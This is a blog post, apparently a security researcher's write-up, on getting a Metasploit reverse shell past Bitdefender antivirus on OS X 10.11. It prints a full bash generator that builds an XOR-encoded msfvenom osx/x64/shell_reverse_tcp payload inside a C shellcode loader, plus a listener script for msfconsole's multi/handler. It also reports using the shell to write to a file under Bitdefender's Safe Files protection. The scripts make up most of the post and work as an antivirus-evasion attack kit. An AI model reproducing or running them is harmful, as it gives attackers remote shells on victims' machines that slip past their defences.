Bypassing antivirus on OSX 10.11 with Metasploit – Bitdefender

Next in line for the tests is Bitdefender. There is no free version, so we are stuck with a trial which you can download from https://www.bitdefender.com/solutions/antivirus-for-mac.html

TL;DR we can get the same code executed fine like with Avast with our custom payload  https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/ but whats also quite interesting, I have tested the Bitdefender file protection SAFE FILES (against crypters I guess) and managed to modify the c source code file on the protected desktop via the Metasploit reverse shell.

Bitdefender detects all EICAR and standard msfvenom generated stuff

So again we try the custom source code template and the shellcode as shown here

Here is a generator for the above to make life easier .. OSX-x64-payload-generator.sh

#!/bin/bash
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
 echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi
echo '[*] Cleaning up '
rm -f osx64-payload.c
./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c
echo "#include <stdio.h>" > temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c
echo '#include <stdint.h>' >> temp.c
echo '' >> temp.c
cat test.c >> temp.c
echo '' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo 'void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'printf("ret: 0x%x",ptr);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo '' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payoad.c generated ...'
ls -la osx64-payload.c
else
 echo '[-] Something went wrong .. '
exit 0
fi

And the listener LISTENER-MAC-LATEST.sh

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD osx/x64/shell_reverse_tcp ; set LHOST ' > run.listener.sh
echo -n $host >> run.listener.sh
echo -n '; set LPORT ' >> run.listener.sh
echo -n $port >> run.listener.sh
echo -n '; run"' >> run.listener.sh
chmod +x run.listener.sh
./run.listener.sh

Here we have some screenshots of compilation and execution of the custom metasploit  payload on OSX with Bitdefender

Whats more interesting though is the Safe Files functionality of Bitdefender, I have enabled the function and let Bitdefender protect my Desktop where I had the original source C file with the payload that I have compiled.  Once in the reverse shell I have did a simple

echo "THIS IS EDITED BY ME RIGHT NOW" >> /Users/user/Desktop/osx64-payload.c

And managed to modify the osx64-payload.c